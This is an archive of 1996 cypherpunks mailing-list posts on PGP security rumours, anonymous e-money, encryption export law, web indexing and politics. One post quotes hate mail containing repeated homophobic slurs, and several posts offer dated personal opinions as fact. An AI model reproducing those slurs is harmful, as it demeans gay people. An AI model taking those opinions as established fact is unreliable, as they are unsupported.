From:	IN%"llurch@networking.stanford.edu"  "Rich Graves" 16-JAN-1996 00:12:29.92

>Morality has nothing to do with it. It's the speed of the evolution. If
you walk across the straits, the system has the time to react and restore
a dynamic equilibrium. If you immediately release a new species with no
natural predators, the system is shattered, and it might not survive. 
This is not to say that ecosystems and societies are static -- they evolve
constantly, displaying unpredictable punctuated equilibrium (Steven J.
Gould was right, Edmund Burke and Karl Marx were wrong).
-------------
     A few things from the biological point of view (and I _will_ try to
bring in a bit of cypherpunks relevance). First, if the ecosystem were as
unstable as the Greens in the 1960's and later kept predicting (Silent Spring
and all that), it would have collapsed already. Look at how many species we've
taken out already. Second, almost all ecosystems that are that vulnerable (to
extinction of a keystone species or to import of something that starts eating)
are small ones that don't really matter in the long run. For one thing, the
more biodiversity _within_ an ecosystem exists, the more likely it is that
something from outside (or something removed from within) will have a control
(or a replacement). In other words, there are fewer and fewer true keystone
species as the internal biodiversity of an ecosystem goes up.
-------------

[...]

>Cute cuddly seals and frieldly dolphins and teddy bears get "sympathy"
among mainstrean "environmentalists," and the Sierra Club and World
Wildlife Federation calendars raise a lot of money, but it's the plants
and bugs and bacteria that are really important. Elephants and blue whales
look big and important to us, but they're really inconsequential in the
larger scheme of biodiversity. They could go extinct and the planet
doesn't really care. But kill the blue-green algae and the trees, and
we're all dead. 
-------------
     The algae? Sure, they're important... they're also thoroughly likely to
not be affected significantly. One, they've got so many things acting on them
in the first place. Two, there is quite a bit of diversity within the algal
group. What takes out one strain (I have always had my doubts about "species"
with mitotically reproducing organisms) is unlikely to take out the rest... and
they mutate quickly enough to give rise to more strains pretty rapidly when one
"niche" is freed up.
     The trees, on the other hand, are in the classification of "nice to look
at but not really neccessary," like the elephants. They're a great carbon
_sink_, but they don't really do that much CO2 recycling. And even if they
were... we can replant trees very quickly. It's the rain forests and the old
growth forests that are hard to replace as such.
      Cypherpunks relevance? Well, digital cash and encrypted messaging make
it a lot easier to do the type of deals you're talking about... they also make
it harder for people to place irrelevant prerequisites (like "not from rain
forest land") on their purchases. So far, most of the anti-cypherpunks
arguments have come from the conservative side. Be prepared for some from the
liberal environmentalists (as well as the liberal socialists who want to keep
lots of tax dollars flowing).
      -Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Wed, 17 Jan 1996 16:56:04 +0800
To: ckey2@eng.ua.edu
Subject: Re: A weakness in PGP signatures, and a suggested solution (long)
Message-ID: <01I038C6R8X2A0UHYW@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From: ckey2@eng.ua.edu (Christopher R. Key)

>First of all, if the recipient is a newsgroup, why would that particular
information need to be part of the signed information?  If you post to a
newsgroup a message that is only signed (as opposed to encrypted also), 
then you are obviously not worried about who reads it.  The signature is 
only a method of proving that the important text (message) is unchanged and
intact, and that the person who it is supposed to be from is the same who 
signed it.
--------------
     How about proving that you _weren't_ spamming? I.e., an enemy spots a
message on a newsgroup from you with a signature, then duplicates it with
header modifications on 500 newsgroups including news.admin.net-abuse.misc
(to add insult to injury). Sorry if a bunch of other people have pointed this
out by the time my message gets to toad.com, but...
     -Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Wed, 17 Jan 1996 21:17:50 +0800
To: owner-cypherpunks@toad.com
Subject: Re:  remarkable recent stories
Message-ID: <9601170059.AA24758@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>odiferous entrails, I'd be interested to here what others think.

Several times I have heard NSA staffers talk about securing our
secrets vs. reading theirs.  It seems that right now the first
side is "winning."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
Date: Wed, 17 Jan 1996 22:15:10 +0800
To: cypherpunks@toad.com
Subject: Crypto-related Pointers
Message-ID: <Pine.BSD.3.91.960116200148.9201A-100000@ahcbsd1.ovnet.com>
MIME-Version: 1.0
Content-Type: text/plain


 
 
  Friend, 
 
 
  Below are pointers to crypto-related items in 01 16 94 
  Edupage: 
 
  CREDIT CARD SOFTWARE FOR INTERNET
  
  SPY AGENCY WARNS OF CORPORATE SPIES
 
 
  To subscribe to Edupage: send a message to:
 
  listproc@educom.unc.edu 
 
  and in the body of the message type:  
 
  subscribe edupage Andrew Sullivan (assuming that your 
  name is Andrew Sullivan;  if it's not, substitute your own 
  name). 
 
  For archive copies of Edupage, ftp or gopher to educom.edu 
  or see URL: 
 
  http://www.educom.edu 
 
 
  Cordially, 
 
  Jim 
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Strasheim <cp@proust.suba.com>
Date: Wed, 17 Jan 1996 10:33:01 +0800
To: pitz@onetouch.com
Subject: Re: pgp broken?
In-Reply-To: <9601162346.AA22192@toad.com>
Message-ID: <199601170205.UAA00460@proust.suba.com>
MIME-Version: 1.0
Content-Type: text


> In speaking with an associate, he mentioned in passing that PGP had 
> been broken a few weeks ago in San Diego by the DoD using a Cray.  
> All questioning about said subject was ended immediately as he felt 
> that he might have said too much how it was.  Was PGP "broken"?

There's a store here in Chicago that sells surveillance equipment.  I had 
driven by it for years and never gone in, and a few weeks ago I finally 
gave in to curiosity and checked it out.

One of the things they were selling was a $100 floppy disk labeled 
"public key encryption".  Is that like PGP?  "No, this is much better.  
PGP can be broken, this uses DES."  (DES isn't a public key algorithm, of 
course, and it's no longer considered secure.)

There have been hundreds of reports like yours throughout PGP's short
history.  They're always second hand, and there's never any information
about the specifics of the attack.  It's hard to take such reports 
seriously.

What do you mean when you speak of "breaking PGP"?  Decrypting a single
message?  Forging a single signature?  Producing a private key from a
public one?  Figuring out a way to make one of those other problems easier
by exploiting a weakness in PGP's implementation?  A new attack on RSA,
IDEA, or MD5?  Coming up with a technique for factoring big numbers?

I'd be willing to bet that most people -- literally, more than half -- who
use PGP have made the mistake of picking a weak passphrase.  If I'm right
about that, it would mean that an awful lot of people who think they have
security don't.  If you pick a weak passphrase, your key could fall to a
dictionary attack.  But that's a problem with the user, not PGP.

It's most likely that the person who told you that PGP had been broken was
mistaken.  If there's anything at all to the story, chances are
overwhelming that he was referring to a successful dictionary attack
against a single key.  A lot of people seem to feel a little uneasy about
MD5, which PGP uses to make signatures;  perhaps some super spook has put 
a dent in that.

Anything is possible.  It's only "Pretty Good" privacy.

But you can rest assured that if credible evidence that PGP has been
compromised ever emerges, you won't have to go digging around for it.  It
will be all over the net and the traditional media.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Wed, 17 Jan 1996 18:22:28 +0800
To: cypherpunks@toad.com
Subject: Re: pgp broken?
In-Reply-To: <9601162346.AA22192@toad.com>
Message-ID: <Pine.LNX.3.91.960116201005.2004A-100000@localhost>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Tue, 16 Jan 1996, greg pitz wrote:
> In speaking with an associate, he mentioned in passing that PGP had 
> been broken a few weeks ago in San Diego by the DoD using a Cray.  
> All questioning about said subject was ended immediately as he felt 
> that he might have said too much how it was.  Was PGP "broken"?
> 
PGP has already been "broken" -- the 384-bit Blacknet key was factored.
Just because the government may be able to factor a 512-bit key, it does not
mean that they can break 2048, 1024, or even a 709-bit key.  If this person
was telling the truth, the government probably only broke a small key.  

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMPxN6LZc+sv5siulAQHlKQP/cdHOmErMIUuIEGWdQ1EL+PhW5RexaxsA
bUDv0eLZ8vPnRDShhWuA6Mo01Vvyej4hu+FkBomqKlmMSjl0YRK9UisoJ30gbrbj
N1obHDsa7BK+jVt1rSujEECDS/GFJ+m4iPyJcnKVRlKK10n+2iTbQ24r2e3ZdcP0
59jYpfbYE8o=
=ReUZ
-----END PGP SIGNATURE-----


--

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
markm@voicenet.com              | finger -l for PGP key 0xf9b22ba5
http://www.voicenet.com/~markm/ | bd24d08e3cbb53472054fa56002258d5
PGP: Because sometimes, a _Captain Midnight_ decoder ring simply
isn't enough.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim@bilbo.suite.com (Jim Miller)
Date: Wed, 17 Jan 1996 16:02:15 +0800
To: maryl@efn.org
Subject: Re: Article on E-money
Message-ID: <9601170216.AA21093@bilbo.suite.com>
MIME-Version: 1.0
Content-Type: text/plain




> Hi-
> 

> I'm a journalist writing an article for an on-line
> magazine about emoney.Seeing your site on the web...
> 


Hi,

I have no Web site of my own.  You probably saw my E-Money FAQ on someone  
else's site and thought I was the site manager.  That's ok, you're not the  
first to make that mistake.


> I was hoping I might ask you a few very general questions
> about the future on emoney as you see it. My article is
> called a  "futureview" article, meaning it makes some
> guesses at what changes people can expect because of new
> technology. 

> 


I'll be happy to answer your questions as best I can.


> -How will the adoption of e-money or e-cash change the
> workplace? Will some kinds of businesses or practices
> prosper while others fail?
> 

> -How will emoney or ecash change people's daily lives at
> home? (More home shopping?)
> 

> -If you had to guess, what do you think the future of emoney
> will be? 

> 

> -Are there any words of hope/caution  you'd like people to
> know?  

> 

> Thanks in adviance for any help you can give. If you have
> more questions about myself or the artcle, feel free to
> call or write me.
> 

> Mary Leontovich xxx/xxx-xxxx email: maryl@efn.org 

> 


Rather than answer each question individually, I'll just ramble on about  
e-money for a bit and hopefully I'll convey some interesting opinions.

The first thing to recognize is that there are two arenas to consider when  
discussing e-money; the on-line arena and the "about town" arena.  I'll  
first discuss the "about town" arena.  It will take a decade or more, but  
eventually e-money purchases will be as common as credit card purchases.   
People will carry e-money cards right along side their credit cards.   
Rather than handing over a few dollar bills, people will insert e-money  
cards into readers.  ATM machines will provide an option to charge up  
e-money cards.  Credit card systems and e-money system will co-exist, and  
in fact you will be able to easily transfer value between credit cards and  
e-money cards.  It is quite likely that the major credit card companies  
will issue multi-purpose super-cards(tm) that can act as either credit or  
e-money cards, reducing the number of cards people carry.  Paper money  
will never go away completely (unless government stops backing paper  
money), but there are a variety of reasons most people will switch from  
using paper money to using e-money cards:

   1) The card can easily keep a record of all a person's e-money  
purchases.  The record can be up-loaded into popular PC-based money  
management software.
   

   2) The card can hold "change" and well as "large bills".  No need to  
carry around a pocketful of coins.
   

   3) The money in the card can't be spent unless the proper PIN number  
(or thumb print, etc) is provided.  Paper money can be spent by any thief.   
Some e-money cards may allow you get reimbursed for lost or stolen  
e-money.  Others may only be able to "void" the lost money.

   4) Some e-money system may allow you to make back-up copies of your  
e-money, in case the card gets damaged.

   5) Paper money wears out, gets torn, etc.
   

   6) Paper money, even in moderate quantities, is bulky.
   

   7) Paper money has to be counted, and people must wait around while  
change is tallied up.  Mistakes could be made.  E-money cards will be  
relatively fool-proof and will work as fast or faster than current credit  
cards.
   

And now the online arena...

People will be able to purchase inexpensive devices that can be connected  
to their PC to transfer e-money from card to computer, and vice versa.   
This device may become a pseudo-standard peripheral, much like a sound  
card is today.  People will be able to purchase items securely over the  
Internet using either credit card numbers or e-money.  A good question to  
ask might be "If people can make secure credit card purchases over the  
Internet, why would they use e-money over the Internet?"  There are a  
variety of reasons people might use e-money rather that credit cards  
online:

    1) The item may cost only a few pennies, or less.  Not enough to  
warrant using a credit card.
    

    2) The vender may not accept credit cards.
    

    3) You may not wish to give the vender your credit card number until  
you have established that the vender is trustworthy.
    

    4) You may wish to pay in "cash" rather than add to your credit card  
balance.
    

    5) You may wish to avoid revealing your "about town" identity to the  
vendor.

Why might a vender accept e-money, but not credit cards?  Well, it costs  
money to accept credit cards.  It will probably cost less money to accept  
e-money.  Very small companies that exist only on-line may not want to pay  
the expense to hook up to the credit card infrastructure.  Cheap e-money  
will lower the barriers to entry for online business.  Huge numbers of  
very small players will come online.  The meaning of the term online  
"business" will change as it becomes easy and economical for individuals  
to charge very small amounts for data or services.  When something become  
cheap and easy (ala World Wide Web), it will become very popular.  When it  
is also a way to make money, it will become common-place.  Most everyone  
with a PC will find a way to make a little money on the side by selling  
something online.  Maybe people will sell idle CPU time or unused disk  
space on their home PCs to people using future Java-like distributed  
applications.  


All this new economic activity will of course be taxed.  That is, if  
government has any say in the matter.  And you can be sure government will  
do its best to have a say.  From reading my E-money FAQ you know there are  
two possible kinds of e-money systems: identified and anonymous.  For both  
tax reasons and law enforcement reasons, governments will do their best to  
insure that anonymous e-money systems fail in the marketplace. Perhaps by  
outright banning them, or by subsidizing identified e-money systems, or by  
not insuring bank accounts that accept anonymous e-money, or by mandating  
accounting or identification systems that preclude the use of anonymous  
e-money.  I'm sure there are other tactics government could use.

Should people care?  What's so bad about identified e-money?  What's so  
good about anonymous e-money?  Most people don't seem terribly upset about  
the personal information they reveal by using credit cards so it is  
reasonable to assume most people will not be upset about the personal  
information they reveal by using identified e-money.  I predict that  
anonymous e-money systems will not fare well in the marketplace for the  
following reasons:

    1) Government pressure against anonymous e-money.
    

    2) Identified e-money systems are easier to build.

    3) Certain technologies necessary for anonymous e-money are patented.   
E-money system builders will tend to roll their own identified e-money  
systems, rather than pay fees or royalties to the patent holders.
    

    4) The financial risks associated with anonymous e-money are more  
complex and harder to evaluate than the financial risks associated with  
identified e-money.  The conservative money will tend to back systems with  
the lower perceived risk, even if the risks associated with anonymous  
e-money are manageable.
    

    5) Identified e-money systems can provide the same external features  
and conveniences as anonymous e-money systems and will most likely become  
widely deployed sooner than anonymous e-money systems.  Once people become  
accustomed to identified e-money systems, it is unlikely they will push  
for a change to anonymous e-money systems.

It is hard for me to explain the reasons why anonymous e-money is  
preferred over identified e-money.  The reasons fall into the "Do you  
trust government, or not" category.  "Do you want the government to know  
about every penny you spend?"  These sort of concerns are easily dismissed  
as alarmist.  After all, say many people, if the government gets out of  
hand we can just vote in different law makers.  That's how democracy  
works.  Well, I don't believe it would be that easy.  Imagine how hard it  
would be to get rid of social security cards.  The information conveyed  
via identified e-money is directly useful to tax agencies and law  
enforcement.  The information has other governmental and commercial uses,  
too.  As with social security numbers, the infrastructure that utilizes  
identified e-money information will become larger the longer the systems  
are in use.  After a time, it will take a ideological revolution to  
convince government and business it must do without such detailed personal  
information.  And revolutions, ideological or otherwise, are never  
painless.  I hope I'm wrong and identified e-money is nothing to worry  
about.  And maybe big government can be trusted. :-)

Jim_Miller@suite.com

P.S. I CC'ed this reply to the cypherpunks mailing list.  You might get  
additional replies from people on that list.

____________________________________________________________________

             The Internet is a land bridge for memes
____________________________________________________________________





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Wed, 17 Jan 1996 00:40:02 +0800
To: attila <alanh@infi.net>
Subject: Re: Crypto anarchist getting through customs
Message-ID: <199601161622.IAA28208@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 08:20 AM 1/16/96 +0000, attila wrote:
> Bubba signed PPD 25 which permits UN control of US
> forces, _in America_!  and allows the UN to bring in UN troops.

While there are undoubtedly people plotting a one world government,
the miserable performance of the blue helmets means that there
is no present danger.  Soldiers are just not willing to die for 
the greater glory of the United Nations.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blanc <blancw@accessone.com>
Date: Wed, 17 Jan 1996 17:32:25 +0800
To: "'vznuri@netcom.com>
Subject: RE: FW: Net Control is Thought Control
Message-ID: <01BAE458.9E49C680@blancw.accessone.com>
MIME-Version: 1.0
Content-Type: text/plain


From: 	Vladimir Z. Nuri

"how can you be so sure that the cypherpunks lists is really
 what you think it is?" 

'Cause I'm real, real smart.

"a bunch of people from around the country independently
interested in crypto?" 

"An effete corp of impudent snobs who fancy themselves intellectuals."
(Spiro Agnew)

"an agent provacteur, or agent saboteur, could
create a vastly different perception regardless of the 
input of other people."

It's true there are juveniles who occasionally disturb the list, but I expect that most members have a real interest in the subjects discussed and wish to bring out pithy points of truth & wisdom for all to behold, taking full credit for their contribution to the general atmosphere of learned intelligence.

People have to grow up from childhood, Nuri-logical, and even then it's possible to be mistaken & to be misled.  But there is no substitute for work, for the work of thought, which is the only means any human being has to solve the problems of living as a conscious, sensitive being.  The only way to deal with all of the problems you mentioned is to continue to work to solve them in the way which will be most satisfactory to moral creatures.
    ..
Blanc




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Johnathan Corgan <jcorgan@aeinet.com>
Date: Wed, 17 Jan 1996 17:25:58 +0800
To: cypherpunks@toad.com
Subject: Ooops
Message-ID: <Pine.LNX.3.91.960116211542.154A-100000@comet.aeinet.com>
MIME-Version: 1.0
Content-Type: text/plain



Some rather, uh... uncreative bash scripting resulted in my trashing beyond 
reasonable repair all my inbox mail for the last half a day or so.  Looks 
like there were a few posts from some list members--please resend any 
important mail.

Thanks.

--
Johnathan M. Corgan
jcorgan@aeinet.com
http://www.aeinet.com/jcorgan.htm

  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Libertarian Party Headquarters <lphq@access.digex.net>
Date: Wed, 17 Jan 1996 23:22:20 +0800
To: cypherpunks@toad.com
Subject: LP RELASE: Government must end attacks on electronic privacy
Message-ID: <Pine.SUN.3.91.960116214328.24583A-100000@access1.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


-----------------------------------------
NEWS FROM THE LIBERTARIAN PARTY
2600 Virginia Avenue, NW, Suite 100
Washington DC 20037
-----------------------------------------
For release: January 16, 1996

For additional information:
Bill Winter, Director of Communications
(202) 333-0008
Internet:73163.3063@CompuServe.com
-----------------------------------------


Government must end attacks on electronic privacy, says Libertarian Party 

        WASHINGTON, DC -- The Justice Department's decision not to prosecute 
Philip R. Zimmermann for violating encryption law is a victory for the First 
Amendment -- but unfortunately won't end the government's attack on electronic
privacy, the Libertarian Party warned today.
        
        "The battle for free speech and privacy still rages on the electronic 
frontier," said Steve Dasbach, Chairman of America's third largest political 
party. 
        
        "One hero -- Phil Zimmermann -- won a great personal victory. But 
government laws restricting cryptography still threaten the privacy and 
security of everyone on the Internet. As long as the government has the power 
to obstruct encryption use, the electronic privacy of all American citizens 
will be in danger," said Dasbach.
        
        After a three-year investigation, the Justice Department announced 
late last week that it would not prosecute Zimmermann, a software developer, 
for posting a cryptography program to the Internet in 1991.
        
        Zimmermann's program -- entitled Pretty Good Privacy (PGP) -- was an 
immediate hit, gaining worldwide popularity as "encryption for the masses." It
was among the first programs to give ordinary computer users the power to 
protect sensitive communications.
        
        PGP and similar encryption software turns electronically transmitted 
information -- such as personal e-mail -- into undecipherable gibberish. 
Messages can then be securely sent across networks, using "keys" that are 
almost impossible to crack.
        
        Under current federal law, complex encryption software such as PGP is 
considered a "munition," and is restricted under the International Trafficking
in Arms Regulations (ITAR). Exporting such software requires a license from 
the government. 
        
        "Unfortunately, the government's decision to drop the Zimmermann case 
leaves unanswered the question of whether posting such materials to the 
Internet constitutes a violation of ITAR export regulations," said Dasbach. 
        
        "And the laws that were used to harass Zimmermann were not changed. 
So, developers of cryptographic programs still run the risk of investigation, 
prosecution, and jail time. For Americans working to protect their electronic 
privacy, the threat remains."
        
        "The government justifies such restrictions by saying that 
law-enforcement agencies would be hindered in their efforts to stop 
terrorists, spies, drug-dealers, and pornographers without them," noted 
Dasbach. 
        
        "These regulations do nothing of the sort, since strong encryption 
technology is freely available worldwide. All these laws do is put U.S. 
software companies at a competitive disadvantage, and chip away at the First 
Amendment's protection -- which apply even to 21st century communications. The
Justice Department needs to remember that before they launch their next 
investigation."
        
        The Libertarian Party platform includes a forceful statement in 
support of electronic privacy: "We oppose all regulations of civilian research
on encryption methods. We also oppose government classification of such 
research, or requirements that deciphering methods be disclosed to the 
government." 

        #       #       #

The Libertarian Party                America's third largest political party
2600 Virginia Ave NW Suite 100       (202) 333-0008           LPHQ@digex.net
Washington DC 20037		     http://www.lp.org/lp/ 
***Send email or call 1-800-682-1776 for free information package by mail***  





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tallpaul@pipeline.com (tallpaul)
Date: Wed, 17 Jan 1996 22:32:04 +0800
To: Jonathon Blake <grafolog@netcom.com>
Subject: Re: remarkable recent stories
Message-ID: <199601170248.VAA14859@pipe9.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


On Jan 16, 1996 18:16:09, 'Jonathon Blake <grafolog@netcom.com>' wrote: 
 
 
>	Suppose the NSA was simply being used as a cutout 
>	for its replacement, which is even more sub rosa? 
> 
 
Paranoid, but not, I think, paranoid enough to be true. 
 
-- 
tallpaul 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tallpaul@pipeline.com (tallpaul)
Date: Wed, 17 Jan 1996 13:32:52 +0800
To: cypherpunks@toad.com
Subject: Crypto hate mail
Message-ID: <199601170257.VAA16456@pipe9.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


On Jan 16, 1996 14:38:52, 'Alan Olsen <alano@teleport.com>' wrote: 
 
 
>This is one of the strangest pieces of mail I have recieved in a while.  I

>know it is not nice to publish private mail, but this has got to be the
most 
>clueless response i have gotten yet on the portland Cypherpunks meeting. 
> 
>Either this guy has lost total connection to his clue-server or he left
his 
>terminal logged in...  Either way it is pretty funny.  (At least he did
not 
>make any references to the "tentacles" of Tim May... ]:> ) 
> 
>>Date: Tue, 16 Jan 1996 07:39:55 -0500 (EST) 
>>From: paul <phoffman@oven.ccds.charlotte.nc.us> 
>>X-Sender: phoffman@oven 
>>To: alano@teleport.com 
>>Subject: cypherpunks meeting 
> 
>> 
>>I THINK THAT ALL CYPHER PUNKS ARE S BUNCH OF FAGGOTS HAVING MEETINGS TO  
>>SEE WHO THEY "WANT"  ALL OF YOU CAN SEND YOUR GAY MESSAGES WITH KEYS  
>>SOMEWHER ELSE YOU DAMN FAGGOTS! 
>> 
>>paul 
>> 
 
A. Olsen is too optimistic by far in his characterization of the likely
psychological state of the person who sent the above message. 
 
I just published my CyberAngel piece in _Computer underground Digest_ and,
during my researches, I heard a lot of material as least as hostile as the
mail Olsen posted. 
 
The hysteria over the Four Horseman, particularly the "kiddie
pornographers" is *intense.*  So is the ignorance. 
 
To repeat in a different form: 
 
the word is "hysteria" as in "Salem Witch Trials." 
 
the ignorance is intense, e.g. ".gif" is a "kiddie porn" code word for
"girlie interchage files" etc.etc. 
-- 
tallpaul 
 
"To understand the probable outcome of the Libertarian vision, see any
cyberpunk B movie wherein thousands of diseased, desparate and starving
families sit around on ratty old couches on the streets watching television
while rich megalomaniacs appropriate their body parts for their personal
physical immortality." 
     R. U. Sirius 
     _The Real Cyberpunk Fakebook_




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Wed, 17 Jan 1996 22:15:44 +0800
To: cypherpunks@toad.com
Subject: Re: Spiderspace
Message-ID: <199601170613.WAA08830@ix5.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>... I was under the impression that the only documents that most web crawlers
>will search are documents that are link-accessible.  Are you saying that this
>isn't true?  Are you saying that Alta-Vista will search EVERYTHING that's
>publicly accessible, whether by anonymous FTP or web?

Don't archie servers already pick up the anonymous ftp fairly well?
Also, aside from no-robots conventions, you can build a cgi program for
access to files that might be more effective at blocking searches
while still preserving access.

Also, it wouldn't be hard for a web-crawler to follow ftp links,
as long as the root of an anon-ftp site is pointed to by a URL somewhere.
#--
#				Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, Pager/Voicemail 1-408-787-1281
#
# "Eternal vigilance is the price of liberty" used to mean us watching
# the government, not the other way around....





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Wed, 17 Jan 1996 22:16:49 +0800
To: Rich Graves <llurch@networking.stanford.edu>
Subject: [NOISE] Re: [NOISE] Re: Eggs at Customs (fwd)
Message-ID: <199601170613.WAA08844@ix5.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:02 PM 1/15/96 -0800, you wrote:
>Morality has nothing to do with it. It's the speed of the evolution. If
>you walk across the straits, the system has the time to react and restore
>a dynamic equilibrium. If you immediately release a new species with no
>natural predators, the system is shattered, and it might not survive. 
>This is not to say that ecosystems and societies are static -- they evolve
>constantly, displaying unpredictable punctuated equilibrium (Steven J.
>Gould was right, Edmund Burke and Karl Marx were wrong).

This appears to have happened in North America about 12000 years ago;
a highly competitive omnivorous predator/scavenger species appeared,
and either out-competed or killed off a number of other large predator
species, as well as some of the large grazing species.
Seen any dire-wolves looking through your windows lately?

>Politically and morally, I'm a follower of the realist school (Morgenthau
>et al). It is right for the US to dominate the world because it has the
>most power. 

Please don't abuse words like "right" for that sort of thing; it's as
tacky as abusing "one-time pad", and there are other words that will
do perfectly well, such as "unsurprising"....
#--
#				Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, Pager/Voicemail 1-408-787-1281
#
# "Eternal vigilance is the price of liberty" used to mean us watching
# the government, not the other way around....





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Wed, 17 Jan 1996 14:41:10 +0800
To: cypherpunks@toad.com
Subject: Re: Number theory text
Message-ID: <199601170613.WAA08890@ix5.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>> PS -- Going to consolidate posts here.  Can someone recommend a good 
>> text for an intro to Number Theory?

When I asked this a year or so ago, somebody recommended Levecque (sp?).
Thin book published by Dover that I bought for about $4 new,
very readable and clear, and the elementary stuff has probably not
changed significantly since ~1960.  You may want something fancier
and more detailed after you finish it, but it was a good start.
Now it's time to finish that book on Group Theory :-)
#--
#				Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, Pager/Voicemail 1-408-787-1281
#
# "Eternal vigilance is the price of liberty" used to mean us watching
# the government, not the other way around....





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Wed, 17 Jan 1996 15:11:39 +0800
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: Spiderspace
In-Reply-To: <199601170613.WAA08830@ix5.ix.netcom.com>
Message-ID: <Pine.SOL.3.91.960116224932.1560B-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


Bill mentions 'archie';  it's interesting to note that the problem of 
stuff that wasn't supposed to be public turning up in archie listings 
dates back to at least 1991. Amongst the problems were hosts of the form  
ftp.<foo>.com which had anyonmous ftp, but which weren't supposed to be 
public, and of files put up on such sites but not announced, usually by 
support people transferring a file to some customer which then got picked 
up in the sweep.


Then of course, there was the time in 1993 when someone left a 
world-writable directory on the X consortium web site intowhich someone 
uploaded 300Mb of pornographic jpegs. This happened over the weekend, so 
they had a nice long chance to sit there while all the mirror sites 
happily duplicated them. If it was your turn to be archied whilst those 
files were there, you were in the database till your next sweep. All 
those Horny net geeks who found the directories empty would then send 
plaintive messages asking where the files were, and how to join the gif club.

Simon

 (defun modexpt (x y n)  "computes (x^y) mod n"
  (cond ((= y 0) 1) 
	((= y 1) (mod x n))
	((evenp y) (mod (expt (modexpt x (/ y 2) n) 2) n))
	(t (mod (* x (modexpt x (1- y) n)) n))))





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Wed, 17 Jan 1996 22:17:41 +0800
To: Scott Brickner <sjb@universe.digex.net>
Subject: Re: Respect for privacy != Re: exposure=deterence?
In-Reply-To: <199601152213.RAA19247@universe.digex.net>
Message-ID: <Pine.BSF.3.91.960117010112.10123E-100000@mercury.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 15 Jan 1996, Scott Brickner wrote:

> s1018954@aix2.uottawa.ca writes:
> >My apologies for responding to a political post.
> >
> >On Sat, 13 Jan 1996, Charlie Merritt wrote:
> >
> >> I feel that public exposure
> >> is enough to put fear into these anonymous government employees.
> >> You will note that when they get the mad_bomber
> >> some FBI guy jumps right up and takes credit, live, on TV.
> >> But when the Air Force orders a $300 toilet seat NO ONE is credited.
> >
> >It's interesting how we advocate anonymity for ourselves but not for our
> >opponents. Feeling righteous?
> 
> I agree with Charlie.  These government employees claim to be working
> for the american taxpayers, of which group I am a member.  Government
> agents must, therefore, expect to be accountable to the citizens, while
                                       ^^^^^^^^^^^

That all depends, of course, by what you mean by "accountable."
And government employees are also taxpayers ...

And what of those using government-funded 
scholarships/computers/univerisities/roads & bridges/etc.

Perhaps all should be "accountable."  Wouldn't want to waste bridge use!

> accountability in the other direction is virtually the definition of
> tyranny.
> 

EBD




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Wed, 17 Jan 1996 22:16:15 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Phil Z getting through customs
In-Reply-To: <m0tbzHU-0008zRC@pacifier.com>
Message-ID: <Pine.BSF.3.91.960117011444.10123F-100000@mercury.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 15 Jan 1996, jim bell wrote:

> At 11:21 AM 1/15/96 -0800, Simon Spero wrote:
> 
> >When I was a student and had long hair, I used to always get questioned
> >when going throught customs. After graduating, and having normal length
> >hair, I had a lot less trouble.
> 
> This seems odd.  Logically (okay, I know logic doesn't work with the 
> government) any smuggler is going to try to be as innocuous as possible.  
> He's cut his hair, and shave, and probably wear a tie, etc.  Which means the 
> government should pay more attention to....

